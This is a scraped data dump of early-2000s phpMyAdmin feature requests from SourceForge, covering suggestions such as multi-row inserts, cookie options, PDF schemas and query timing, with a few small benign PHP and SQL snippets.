But I wasn t able to get it to work I get an formular empty error when submitting form I even tried to fix this in funxtions.js).
It would be fine if someone could make this work.
Original URL https sourceforge.net p phpmyadmin feature requests 165 https sourceforge.net p phpmyadmin feature requests 165 Original author s03nk3","enhancement"
"24444","4870","MySQL manual references local copy.
THere are a lot of people that is using MySQL and phpMyAdmin on computers and networks that is not connected to the internet for various reasons.
The links in phpMyAdmin is pointing to MySQL s amp;quot;Searchable, with user comments amp;quot; manual pages which is not easibly downloadable.
Would it be possible to use the amp;quot;HTML, one page per chapter amp;quot; pages instead?
They are easy to download in a tar ball.
Maybe have a cfgManualBaseLong setting that you could point to your local manual copies, and a cfgUseManualBaseShort = TRUE FALSE to select the short or long pages?
Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin feature requests 166 https sourceforge.net p phpmyadmin feature requests 166 Original author sven erik","enhancement"
"24444","4871","XML dumps.
xml option to mysqldump, if the user have mysql version 3.23.48 Original URL https sourceforge.net p phpmyadmin feature requests 167 https sourceforge.net p phpmyadmin feature requests 167 Original author anonymous","enhancement"
"24444","4872","show edit links based on user permission.
Added a new function, PMA isGrantValid grant, table), which checks to see if the current user has permissions to perform edit, update, etc.
before showing the appropriate link for Edit or Update on the table browse and edit pages.
Thus, if a user does not have permission to Update, the update link will not show when browsing data in a table.
Note I have not tried to apply these changes to the table properties page.
Since this page is going through some major changes as of mid May 2002), I will wait on this.
jd Original URL https sourceforge.net p phpmyadmin feature requests 185 https sourceforge.net p phpmyadmin feature requests 185 Original author jfdavis","enhancement"
"24444","4873","SYSDATE ) as default for DATETIME fields.
Whilst looking for a way to automatically put a timestamp against when a field was inserted I happened to put SYSDATE ) in the default box when inserting a new field of type DATETIME into a table.
To my shock this actually works!
The new field contains the current date and time.
However, looking at the table using phpMyAdmin reveals no evidence of this default value, just 0000 00 00 00 00 in the default column.
Although the SYSDATE ) works it is invisible in the default column.
It would be good to change this and also give the user a drop down list box or such to allow this to be entered without knowing exactly what to type.
There are many cases when an automatic timestamp on when a record is entered is useful.
It would be a useful feature of phpMyAdmin to be able to control this functionality.
My details phpMyAdmin 2.2.5 MySQL 2.23.41 Original URL https sourceforge.net p phpmyadmin feature requests 168 https sourceforge.net p phpmyadmin feature requests 168 Original author barrymyles","enhancement"
"24444","4874","Interface) browse mode frames.
Suggested in the forum use top, bottom or top bottom frames in browse mode for easier access of the Show section hor vert mode, etc) Original URL https sourceforge.net p phpmyadmin feature requests 169 https sourceforge.net p phpmyadmin feature requests 169 Original author lem9","enhancement"
"24444","4875","Single click Backup or Restore whole db.
It would be nice to have a single click Backup and restaore feature of the whole mySql Database.
Regards rg Original URL https sourceforge.net p phpmyadmin feature requests 170 https sourceforge.net p phpmyadmin feature requests 170 Original author anonymous","enhancement"
"24444","4876","Dump all databases.
From Jochen Staerk jstaerk at usegroup.de) Hi list, in order to get a backup of my mysql, when i wasn t able to get through to my mysqldump, i ve written a patch to today s mysql cvs download which says it s a 2.23??
is that okay?).
My lines are marked with js.
In tbl dump.php i had to move lots of code into a new function, buildDBDump showDropCreateDatabase); since i need this in a while loop when dumping all dbs and in a if when dumping just one db s content.
i haven t participated in this list before and so i don t know if this functionality was left out on purpose.
if so, please drop me a line.
In main.php, i used strViewDumpDB amp;quot;View dump schema) of database amp;quot; instead of creating a amp;quot;View dump schema) of all databases amp;quot; which would have been correct but had introduced a new variable to translate into other languages.
hope the changes are somehow valuable... regards Jochen Original URL https sourceforge.net p phpmyadmin feature requests 171 https sourceforge.net p phpmyadmin feature requests 171 Original author lem9","enhancement"
"24444","4877","Default initial query at table Browse.
Sent to the phpMyAdmin devel list by amp;quot;Igor amp;quot; amp;lt;igorpamic mlakar.com amp;gt; My thought is that when you have for example a table t persons and you place a query in the bookmark table with the same name as the table that this query should be executed instead of the amp;quot;select ... amp;quot; when you click amp;quot;browse amp;quot;.
Original URL https sourceforge.net p phpmyadmin feature requests 173 https sourceforge.net p phpmyadmin feature requests 173 Original author rabus","enhancement"
"24444","4878","Execute button for bookmark table.
Sent to the phpMyAdmin devel list by amp;quot;Igor amp;quot; amp;lt;igorpamic mlakar.com amp;gt; That means that I think it would be nice if you browse the bookmark table that you get an additional button or link in each line to execute the defined query.
Original URL https sourceforge.net p phpmyadmin feature requests 174 https sourceforge.net p phpmyadmin feature requests 174 Original author rabus","enhancement"
"24444","4879","Cookies) last used database.
It would be great if PMA would store the selected database in a cookie, so that it is selected as default the next time you access PMA from the same computer.
It could be done in the exact same way as for the default language.
Original URL https sourceforge.net p phpmyadmin feature requests 192 https sourceforge.net p phpmyadmin feature requests 192 Original author chris01","enhancement"
"24444","4880","Relation) Cross DB relations.
I ve just started working with relatons within phpMyAdmin.
I m going to implement the table within all my databases.
One thing that I do is use indexes to other databases on the same server.
My reasoning which may be flawed, I admit) is that I can organize by basic feature of my intranet via database and put details into individual tables.
For instance, I m working on an IT database for managing everything to do with all the computers in our facility.
One column in the main computer table is a link to the employees table, indicating who the primary user of that machine is.
Of course, the employees table is in the HR database, and not the IT database.
So being able to do referential checks is not currently possible as far as I can find so far) within the current implementation.
Thanks, Michael Original URL https sourceforge.net p phpmyadmin feature requests 175 https sourceforge.net p phpmyadmin feature requests 175 Original author anonymous","enhancement"
"24444","4881","insert multiple rows at a time.
It would be nice if users could insert multiple rows at a time.
For example, a user clicks Insert Muliple and is taken to a screen with text boxes, drop downs etc.
laid out in the same way as the Browse view with 10 or so empty rows can do without Function and Null columns that appear on the regular Insert page).
Since mySQL doesn t support transaction rollbacks, if there are errors with certain rows, the erred rows could be displayed onsubmit with a note telling the user to fix them, while the correct rows have already been inserted.
Original URL https sourceforge.net p phpmyadmin feature requests 178 https sourceforge.net p phpmyadmin feature requests 178 Original author anonymous","enhancement"
"24444","4882","View PDF button after editing PDF page.
After editing a PDF page it would be nice to then have the ability to view the new PDF page without having to go back.
Original URL https sourceforge.net p phpmyadmin feature requests 197 https sourceforge.net p phpmyadmin feature requests 197 Original author anonymous","enhancement"
"24444","4883","Table Properties max length functions).
When converting much data to and from other tables it would be nice to have the ability to display the MAX LENGTH of the content within the database to know where to clip the info and or if anything will get clipped.
Other functions may be nice to display as well on only a selected set or the full database.
I m using this hack right now amp;lt;?
link = mysql pconnect amp;quot;localhost amp;quot;, amp;quot; login amp;quot;, amp;quot; password amp;quot;) or die amp;quot;Could not connect amp;quot;); mysql select db amp;quot; dbname amp;quot;); query = amp;quot;SELECT FROM tablename amp;quot;; result = mysql query query) or die amp;quot;Query failed amp;quot;); get column metadata print amp;quot; amp;lt;table border= 1 amp;gt; amp;lt;tr amp;gt; amp;lt;td amp;gt;field amp;lt; td amp;gt; amp;lt;td amp;gt; max length amp;lt; td amp;gt; amp;lt;td amp;gt;mysql field len amp;lt; td amp;gt; amp;lt;td amp;gt; type amp;lt; td amp;gt; amp;lt;td amp;gt;blob amp;lt; td amp;gt; amp;lt;td amp;gt;multiple key amp;lt; td amp;gt; amp;lt;td amp;gt; not null amp;lt; td amp;gt; amp;lt;td amp;gt;numeric amp;lt; td amp;gt; amp;lt;td amp;gt;primary key amp;lt; td amp;gt; amp;lt;td amp;gt;table amp;lt; td amp;gt; amp;lt;td amp;gt; unique key amp;lt; td amp;gt; amp;lt;td amp;gt;unsigned amp;lt; td amp;gt; amp;lt;td amp;gt;zerofill amp;lt; td amp;gt; amp;lt; tr amp;gt; amp;quot;); for i = 0; i amp;lt; mysql num fields result); i ) \{ meta = mysql fetch field result); if !
meta) \{ print amp;quot; amp;lt;td amp;gt;No information available amp;lt; td amp;gt;\n amp;quot;); continue; \} print amp;quot; amp;lt;tr amp;gt; amp;quot;); printf amp;quot; amp;lt;td amp;gt; d) s amp;lt; td amp;gt; amp;quot;, i, meta amp;gt;name); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;max length); printf amp;quot; amp;lt;td amp;gt; d amp;lt; td amp;gt; amp;quot;, mysql field len result, i)); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;type); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;blob); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;multiple key); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;not null); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;numeric); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;primary key); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;table); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;unique key); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;unsigned); printf amp;quot; amp;lt;td amp;gt; s amp;lt; td amp;gt; amp;quot;, meta amp;gt;zerofill); print amp;quot; amp;lt; tr amp;gt;\n amp;quot;); \} print amp;quot; amp;lt; table amp;gt;\n amp;quot;); ?
amp;gt; the above yields this amp;lt;table border= 1 amp;gt; amp;lt;tr amp;gt; amp;lt;td amp;gt;field amp;lt; td amp;gt; amp;lt;td amp;gt; max length amp;lt; td amp;gt; amp;lt;td amp;gt;mysql field len amp;lt; td amp;gt; amp;lt;td amp;gt; type amp;lt; td amp;gt; amp;lt;td amp;gt;blob amp;lt; td amp;gt; amp;lt;td amp;gt;multiple key amp;lt; td amp;gt; amp;lt;td amp;gt; not null amp;lt; td amp;gt; amp;lt;td amp;gt;numeric amp;lt; td amp;gt; amp;lt;td amp;gt;primary key amp;lt; td amp;gt; amp;lt;td amp;gt;table amp;lt; td amp;gt; amp;lt;td amp;gt; unique key amp;lt; td amp;gt; amp;lt;td amp;gt;unsigned amp;lt; td amp;gt; amp;lt;td amp;gt;zerofill amp;lt; td amp;gt; amp;lt; tr amp;gt; amp;lt;tr amp;gt; amp;lt;td amp;gt; 0) id amp;lt; td amp;gt; amp;lt;td amp;gt;3 amp;lt; td amp;gt; amp;lt;td amp;gt;6 amp;lt; td amp;gt; amp;lt; td amp;gt;int amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt;test bak amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt; tr amp;gt; amp;lt;tr amp;gt; amp;lt;td amp;gt; 1) title amp;lt; td amp;gt; amp;lt;td amp;gt;74 amp;lt; td amp;gt; amp;lt;td amp;gt;128 amp;lt; td amp;gt; amp;lt;td amp;gt; string amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;test bak amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt; tr amp;gt; amp;lt;tr amp;gt; amp;lt;td amp;gt; 2) category amp;lt; td amp;gt; amp;lt;td amp;gt;2 amp;lt; td amp;gt; amp;lt;td amp;gt;128 amp;lt; td amp;gt; amp;lt; td amp;gt;string amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt; 0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;test bak amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt; 0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt; tr amp;gt; amp;lt;tr amp;gt; amp;lt;td amp;gt; 3) body amp;lt; td amp;gt; amp;lt;td amp;gt;65535 amp;lt; td amp;gt; amp;lt;td amp;gt;65535 amp;lt; td amp;gt; amp;lt;td amp;gt;blob amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt; td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;test bak amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt; td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt; tr amp;gt; amp;lt;tr amp;gt; amp;lt;td amp;gt; 4) flag amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt; string amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;1 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;test bak amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt;td amp;gt;0 amp;lt; td amp;gt; amp;lt; tr amp;gt; amp;lt; table amp;gt; Original URL https sourceforge.net p phpmyadmin feature requests 179 https sourceforge.net p phpmyadmin feature requests 179 Original author macmeister","enhancement"
"24444","4884","interface) EXPLAIN link.
I d like to see a quick access to a link or button that will run a query prefixed with EXPLAIN.
This functionality would be useful to users new to database programming for learning where they re doing things wrong, as well as for experts for optimization purposes.
I would like to see a check box with the query entry textbox, as well as a link on the query result page.
Thanks, Michael Original URL https sourceforge.net p phpmyadmin feature requests 180 https sourceforge.net p phpmyadmin feature requests 180 Original author redbeardc","enhancement"
"24444","4885","Link MySQL error code with explanation..
When outputting an error message like the one below which replaces the normal output page) add a pointer or link to relevant documentation describing the error in more detail.
Hopefully, it s support one in finding out what to do about it ; ) Tx, Purodha Hostsharing eG) http www.hostsharing.net Fehler SQL Befehl SELECT FROM `tables priv` LIMIT 0, 33 MySQL meldet Got error 127 from table handler Zurxc3xbcck Original URL https sourceforge.net p phpmyadmin feature requests 181 https sourceforge.net p phpmyadmin feature requests 181 Original author purodha","enhancement"
"24444","4886","Server drop down in left frame.
I have hacked this feature into all versions of phpmyadmin that I have used.
Above the Home link, a header would be nice to see exactly which server you are connected to.
As I use multiple servers, I always have to see where I m at, especially with multiple phpmyadmin sesions running.
This could be enhanced into a drop down box to hot switch from one server to another, with the current server being selected .
Original URL https sourceforge.net p phpmyadmin feature requests 183 https sourceforge.net p phpmyadmin feature requests 183 Original author nitebyte","enhancement"
"24444","4887","Synchronize 2 databases.
What do you thing of adding this feature to PHPmyadmin automatic update between 2 databases when requested by the user.
The added dates on one base are added to the other database.
Original URL https sourceforge.net p phpmyadmin feature requests 184 https sourceforge.net p phpmyadmin feature requests 184 Original author mrmar","enhancement"
"24444","4888","Doesn t work in Opera ....
Please make the software opera compatible .... version 2.2.5 doesn t work on opera on windows ..... Danny ....
Original URL https sourceforge.net p phpmyadmin feature requests 186 https sourceforge.net p phpmyadmin feature requests 186 Original author anonymous","enhancement"
"24444","4889","Printer friendly version of query result.
I d like to have a printer friendly version not only of the table infos but also of the contents after I did a SELECT.
For example clicked amp;quot;Browse amp;quot; for a table) Original URL https sourceforge.net p phpmyadmin feature requests 187 https sourceforge.net p phpmyadmin feature requests 187 Original author andrehaensel","enhancement"
"24444","4890","maybe someday) Support for other DBMS.
I use this phpMyAdmin tool since a month with my SourceForge mySQL account, this is the perfect tool.
I was wondering if you had any plan to port it to PostgreSQL and Oracle8i.
I currently use TOAD for Oracle8i, but having a Web Based management version would be much better!
If you need any help on the port, let me know.
Sincerely, Fred.
Original URL https sourceforge.net p phpmyadmin feature requests 203 https sourceforge.net p phpmyadmin feature requests 203 Original author fprog","enhancement"
"24444","4891","Browse mode) add checkboxes and action choice.
I can change multiple columns at once in a table definition, but it would be useful if I could change a couple of lines on one screen.
Check a checkbox in every line that must be edited in amp;quot;Browse amp;quot; and then click some amp;quot;Edit amp;quot; button.)
Original URL https sourceforge.net p phpmyadmin feature requests 188 https sourceforge.net p phpmyadmin feature requests 188 Original author andrehaensel","enhancement"
"24444","4892","2.4.0) Any Host, Host [] localhost.
Of course I could implement it by myself, but I think it isn t a bad idea to include a Radiobutton amp;quot;localhost amp;quot; in addition to amp;quot;Any Host amp;quot; and amp;quot;Host amp;quot; when creating a user.
Original URL https sourceforge.net p phpmyadmin feature requests 189 https sourceforge.net p phpmyadmin feature requests 189 Original author andrehaensel","enhancement"
"24444","4893","Plain password in Cookie Mode on phpinfo ).
Hi, The phpMyAdmin s Cookie Mode is very great and user friendly when compared to httpauth prompting a dialog) and config plain text passwords in config file).
Of late, I noticed a serious security hazard with this cookie mode, whilst I was debugging my php script and checking phpinfo for information.
It was revealing my database username and database password that too in unencrypted state.
I would like to suggest that at least this password be garbled in some fashion since many production sites to use phpMyadmin.
Perhaps a session id can store this password.
But for that phpMyAdmin is simply fantastic, excellent and invincible.
deepak Original URL https sourceforge.net p phpmyadmin feature requests 190 https sourceforge.net p phpmyadmin feature requests 190 Original author vdeepakkumar","enhancement"
"24444","4894","Row duplication cloning).
What I miss is row cloning.
When clicked amp;quot;Clone amp;quot; added next to amp;quot;Edit | Delete amp;quot; in row entry) the amp;quot;Insert new record amp;quot; form should be opened, with all the fields filled with the content of the record I wish to clone.
Then, I d be able to edit what should be changed and insert this as new row on submit.
Shouldn t be that hard to implement, but would be nice to have.
Regards, Original URL https sourceforge.net p phpmyadmin feature requests 191 https sourceforge.net p phpmyadmin feature requests 191 Original author carl os","enhancement"
"24444","4895","Rearrange fields.
Able to rearrange fields example of fields FirstName | Number | Counter | LastName It d be nice to be able to rearrange it so that it becomes Counter | LastName | FirstName | Number I ve tried doing a google search and scanning though features but couldn t find this option.
I hope this isn t a repeat) Original URL https sourceforge.net p phpmyadmin feature requests 193 https sourceforge.net p phpmyadmin feature requests 193 Original author gengoku","enhancement"
"24444","4896","automatic date and number formatting.
i d like to do something that allows the user to choose his usual way of showing date,time and numbers and then have all output formatted this way, and also userinput accepted in this format.
= amp;gt; you once choose from a select that you use date as dd.mm.yyyy so you can enter it like this and it will be formatted to yyyy mm dd to be entered in the db without the user having to think about it.
2 problems First i think this should possibly wait until every user is able to choose this himself using db config?
Second, with the format yyyy mm dd i can easily search for everything within may 2002 using like 2002 05 , if the user wants to use dd.mm.yyyy formatting he would have to say .mm.yyyy and i would have to change this to yyyy mm .
it is possible, it can be done easily and fast, the problem is only will it be more or less easy to understand than just having the user use mysqls internal dateformat?
Original URL https sourceforge.net p phpmyadmin feature requests 194 https sourceforge.net p phpmyadmin feature requests 194 Original author mikebeck","enhancement"
"24444","4897","Cookies) server name.
I have a couple subdomains on a server and since the way phpMyAdmin saves cookies is using just the server name they are sharing the phpMyAdmin cookies.
It would be nice to be able to toggle a variable so that in one mode the server name is .. well the server name ) and in another mode it uses the full server name, subdomain included.
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 195 https sourceforge.net p phpmyadmin feature requests 195 Original author anonymous","enhancement"
"24444","4898","Copy Table Contents.
Did I ever ask about this?
In my current version of PHPMyAdmin I cannot copy table contents from one table to another, only the structure.
I know such an operation could be tricky, but will this be added in the future?
Original URL https sourceforge.net p phpmyadmin feature requests 196 https sourceforge.net p phpmyadmin feature requests 196 Original author jtjohnston","enhancement"
"24444","4899","PDF relation query pdf schema.php).
I couldn t get past an error when I set up a amp;quot;relation amp;quot; between two tables and tried to see a PDF graphic of the relation.
The sql call to the relation kept retrieving 0 records.
Soooo.
I modified the following in pdf schema.php and then all was fine.
Original code sql = SELECT .
FROM .
PMA backquote cfgRelation[ relation ]) .
WHERE master db = \ .
db .
\ .
AND foreign db = \ .
db .
\ .
AND master table IN .
intable . )
; .
AND foreign table IN .
intable . )
; New Code sql = SELECT .
FROM .
PMA backquote cfgRelation[ relation ]) .
WHERE master db = \ .
db .
\ .
AND master table IN .
intable . )
; In my experience a table having a relation unto itself is rather rare.
Mostly you have table external relations.
Original URL https sourceforge.net p phpmyadmin feature requests 212 https sourceforge.net p phpmyadmin feature requests 212 Original author anonymous","enhancement"
"24444","4900","Add ability to DROP IF EXISTS when copy.
When copying a table from one database to another I d love to be able to drop the target table if it already exists.
In addition, copy database would be nice for those of us who have development test production databases and need to synchronize them periodically.
Original URL https sourceforge.net p phpmyadmin feature requests 198 https sourceforge.net p phpmyadmin feature requests 198 Original author anonymous","enhancement"
"24444","4901","Default screen choice after table click.
How about adding a config variable to set which screen th euser goes to after clicking a table name.
Not everyone wants to go to the SQL window.
Often, I need to go to Operations instead Original URL https sourceforge.net p phpmyadmin feature requests 199 https sourceforge.net p phpmyadmin feature requests 199 Original author anonymous","enhancement"
"24444","4902","Query timing.
From the project page on FreshMeat I think it would be nice to have the time an SQL Query takes printed with the results.
I t will be very convenient for optimizing your queries.
Original URL https sourceforge.net p phpmyadmin feature requests 200 https sourceforge.net p phpmyadmin feature requests 200 Original author robbat2","enhancement"
"24444","4903","add field names above query box.
in the older versions i used to use the table properties that was on the same page as the query box to get column names.
Since the pages are split now, this is dificult.
So i added a field list above my query box.
Might be usefull to others.
Original URL https sourceforge.net p phpmyadmin feature requests 201 https sourceforge.net p phpmyadmin feature requests 201 Original author anonymous","enhancement"
"24444","4904","Cascading Deletes.
Would it be feasible to add the ability to specify a relationship between two fields in different tables eg.
an auto increment int parent.id and int children.parent id which references parent.id ) so that if a parent record is deleted all corresponding children records are deleted as well?
Are any plans for something like this in the works?
Original URL https sourceforge.net p phpmyadmin feature requests 218 https sourceforge.net p phpmyadmin feature requests 218 Original author tsilihin","enhancement"
"24444","4905","Add AllowUserCreateDatabase cfg option.
Need for a new cfg option cfg[ AllowUserCreateDatabase ] = FALSE; show a Create new database link to normal users.
No need of the large amp;quot;Create new database amp;quot; option when the user can t use it ) Original URL https sourceforge.net p phpmyadmin feature requests 202 https sourceforge.net p phpmyadmin feature requests 202 Original author hoise","enhancement"
"24444","4906","?)
Reset of auto increment.
ALTER TABLE tbl name AUTO INCREMENT = n Original URL https sourceforge.net p phpmyadmin feature requests 204 https sourceforge.net p phpmyadmin feature requests 204 Original author anonymous","enhancement"
"24444","4907","relation foreign >master.
I wanted pma to let the user click on MemberID browse page) and show all entries from sites table which have the proper MemberID .
After figuring out how pma stores that data I changed the proper entry in relation table and it works.
Why isn t this possible directly from pma?
A bug or something else?
Original URL https sourceforge.net p phpmyadmin feature requests 205 https sourceforge.net p phpmyadmin feature requests 205 Original author ci dev","enhancement"
"24444","4908","Variable usage throughout product.
Configuration of PHP 4.2.1 recommends code be created to not register form data as global script variables and is set to amp;quot;Off amp;quot; by default.
Code should be designed and implemented to not require alteration to secure installations in php.ini file.
Original URL https sourceforge.net p phpmyadmin feature requests 206 https sourceforge.net p phpmyadmin feature requests 206 Original author cuppett","enhancement"
"24444","4909","dublicate) ZIP features.
Please add the capability of export database in zipped text format and the ability to upload zipped or not zipped file to a server with a database query text Original URL https sourceforge.net p phpmyadmin feature requests 207 https sourceforge.net p phpmyadmin feature requests 207 Original author anonymous","enhancement"
"24444","4910","SQL History Tracking.
I think a neat feature would be to somehow mark a place in time by clicking a button or something), then phpmyadmin would keep track of all alter, create and drop queries on a specified database after that point.
This way, I can create my database on two machines, mark the place in time on the one machine, then periodically merge over the amp;quot;changes amp;quot; onto my other machine.
Sort of like a simple form of replication but without the real time aspect.
Original URL https sourceforge.net p phpmyadmin feature requests 208 https sourceforge.net p phpmyadmin feature requests 208 Original author jplock","enhancement"
"24444","4911","PDF Schema Upgrade.
!
thing i would like for the schema output function is to be able to set the width of the outputted tables.
also i would like to see the ability to section off part of the schema page, by this i mean set a section of the pdf and it will put a background for that part.
i have included a digram from another program that shows a nice neet look that the schema can take eventually, i have removed some feild names for privacy reasons) btw i love what youve done so far on that section its great and im atarting o use it for diagrams that i show clients.
keep up the good work Original URL https sourceforge.net p phpmyadmin feature requests 209 https sourceforge.net p phpmyadmin feature requests 209 Original author thrasher6669","enhancement"
"24444","4912","subsheet.
add a subsheet functionality like Microsoft Access 2000 Original URL https sourceforge.net p phpmyadmin feature requests 224 https sourceforge.net p phpmyadmin feature requests 224 Original author anonymous","enhancement"
"24444","4913","automatic update of PMA tables.
When I rename a field in the structure tab.
There is no update of the relation table and probably column comments table or table info table I did not test if I delete a field but I think it s the same or if I rename of table for all those tables Original URL https sourceforge.net p phpmyadmin feature requests 210 https sourceforge.net p phpmyadmin feature requests 210 Original author mdelorme","enhancement"
"24444","4914","2.3.0 rc3) sql code beautifier.
1) a little parser who beautifies large sql code that is entered in the sql box, maybe with config option to enable disable.
so sql code would look like this SELECT p.foo, a.foo2 FROM test a, test2 b WHERE a.foo=b.foo2 ORDER BY a.foo 2) sql query box should be way larger.
maybe adjustable in config ?
Original URL https sourceforge.net p phpmyadmin feature requests 211 https sourceforge.net p phpmyadmin feature requests 211 Original author anonymous","enhancement"
"24444","4915","?)
Email notification on data change.
It is really importamt i believe that phpmyadmin will be able to automatically notify me with an email when there is a change in a database.
For example when someone does an insert in a table.
It would be great if you made this happen.
Thanks in advance!!!
Original URL https sourceforge.net p phpmyadmin feature requests 213 https sourceforge.net p phpmyadmin feature requests 213 Original author anonymous","enhancement"
"24444","4916","Setup script.
Many PHP tools come with an install.php script which makes it easy to set up the package for the first time.
On successive upgrades of phpMyAdmin my only configuration need has been telling config.inc.php the full path to the installation directory.
On the other hand, the documentation insists that we should not just copy an old config.inc.php over the new one.
So, an install.php which greeted the user, took the valid information from a previous installation and highlighted whatever has changed, would be a neat improvement.
Therefore, users would unpack phpMyAdmin, open install.php, read a nice sallutation by the phpMyAdmin team, check that the data suit them using pull down menus or text fields, and they would be done.
May be not all the configurable data should be shown, like more advanced settings could still be done by manually editing the file.
Xosxc3xa9 Calvo Original URL https sourceforge.net p phpmyadmin feature requests 228 https sourceforge.net p phpmyadmin feature requests 228 Original author xosecalvo","enhancement"
"24444","4917","?)
config.
if SERVER[ SERVER NAME ] == amp;quot;localhost amp;quot;)\{ cfg[ PmaAbsoluteUri ] = http localhost phpMyAdmin ; \}else\{ cfg[ PmaAbsoluteUri ] = http www.domain.de phpMyAdmin ; \} regards uli pahlke Original URL https sourceforge.net p phpmyadmin feature requests 214 https sourceforge.net p phpmyadmin feature requests 214 Original author ulipahlke","enhancement"
"24444","4918","Improve Users Administration.
Hi, it would be asome, to add, remove, and difine privilegies and grant, throuth a better interface than sql statments.
thanks.
Federico Larsen.
Original URL https sourceforge.net p phpmyadmin feature requests 215 https sourceforge.net p phpmyadmin feature requests 215 Original author anonymous","enhancement"
"24444","4919","Allow or not wllowCreate new database.
Hi, it would be great if the administrator can manage it in the config.inc.php to allow the user to create new database or not !
Best regard Rene Original URL https sourceforge.net p phpmyadmin feature requests 216 https sourceforge.net p phpmyadmin feature requests 216 Original author anonymous","enhancement"
"24444","4920","validation of bookmarks configuration in 2.3.2).
I created a database called phpMyAdmin and all six other tables as they are mentioned in the documentation.
Additionally I set pmadb to phpMyAdmin and bookmarktable to PMA bookmark .
But it won t work.
I can use a query and an input box for entering a name for the query appears, after typing something there and hitting the button no error appears, the query gets re executed again there should be a checkbox whether to just bookmark it without re executing) and the input box isn t displayed anymore.
But nothing got inserted in the PMA bookmark table.
Original URL https sourceforge.net p phpmyadmin feature requests 217 https sourceforge.net p phpmyadmin feature requests 217 Original author ci dev","enhancement"
"24444","4921","uploads) Fix for MySQL 3.23.49 .
For MySQL 3.23.49 and later you cannot upload files from phpMyAdmin because this is turned off by default in the version of MySQL that ships with Red Hat 7.3 3.23.49 3).
More information can be found here http www.mysql.com doc L O LOAD DATA LOCAL.html Basically if I want to upload files now I cant use phpMyAdmin, I have to log into the command line client ie mysql u root p local infile=1 and issue the SQL query for inserting from here.
It would be great if there was some sort of fix for this so I could use phpMyAdmin for uploading text files again.
thanks, Craig Original URL https sourceforge.net p phpmyadmin feature requests 219 https sourceforge.net p phpmyadmin feature requests 219 Original author anonymous","enhancement"
"24444","4922","Link to reload server.
After each operations which requires to reload the server, there should be a link to do so, not just reminder.
There is a link after you created a new user, but it s the only place I noticed it.
Better more, why not reload the server automatically instead of forcing you to click a link to do so?
After all it takes less than a second to reload the server, it s not like it was a long operation.
Original URL https sourceforge.net p phpmyadmin feature requests 220 https sourceforge.net p phpmyadmin feature requests 220 Original author anonymous","enhancement"
"24444","4923","Relation) combobox when inserting editing.
If we use the PMA relation Table this should also cause to show a Combobox with the releated Records from a releated Table in Add Change Record Page.
This could may be done by adding a field to the PMA relation Table master cb show field), which will be shown as Combobox in all Add Change Pages for the field if referred.
